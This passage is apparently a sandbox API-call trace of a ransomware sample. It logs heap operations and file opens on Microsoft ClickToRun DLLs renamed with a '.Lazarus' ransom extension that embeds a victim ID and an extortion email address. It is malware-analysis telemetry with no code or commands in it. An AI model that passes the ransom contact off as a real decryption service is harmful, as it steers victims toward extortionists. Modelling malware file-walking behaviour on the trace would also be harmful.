returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4b5a8 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x4e568 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x70378 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0092.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1a8) returned 0x78f68 [0092.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70378 | out: hHeap=0x20000) returned 1 [0092.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0092.471] AreFileApisANSI () returned 1 [0092.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 144 [0092.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0092.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.471] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0092.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0092.471] AreFileApisANSI () returned 1 [0092.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.480] GetFileType (hFile=0x33c) returned 0x1 [0092.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.480] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.480] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.480] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.489] CloseHandle (hObject=0x33c) returned 1 [0092.506] AreFileApisANSI () returned 1 [0092.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.507] GetFileType (hFile=0x33c) returned 0x1 [0092.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.507] CloseHandle (hObject=0x33c) returned 1 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81e20 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81918 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0092.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0092.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0092.509] AreFileApisANSI () returned 1 [0092.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.509] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8fa12fdc, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8)) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0092.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.509] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x903435ee, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="APPVIS~2.LAZ")) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0092.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ca40 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81ed8 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x4e568 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0092.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0092.510] AreFileApisANSI () returned 1 [0092.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 144 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0092.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0092.511] AreFileApisANSI () returned 1 [0092.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.511] GetFileType (hFile=0x33c) returned 0x1 [0092.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.511] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.511] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.512] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.512] CloseHandle (hObject=0x33c) returned 1 [0092.512] AreFileApisANSI () returned 1 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.512] GetFileType (hFile=0x33c) returned 0x1 [0092.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.513] CloseHandle (hObject=0x33c) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.513] RtlAllocateHeap 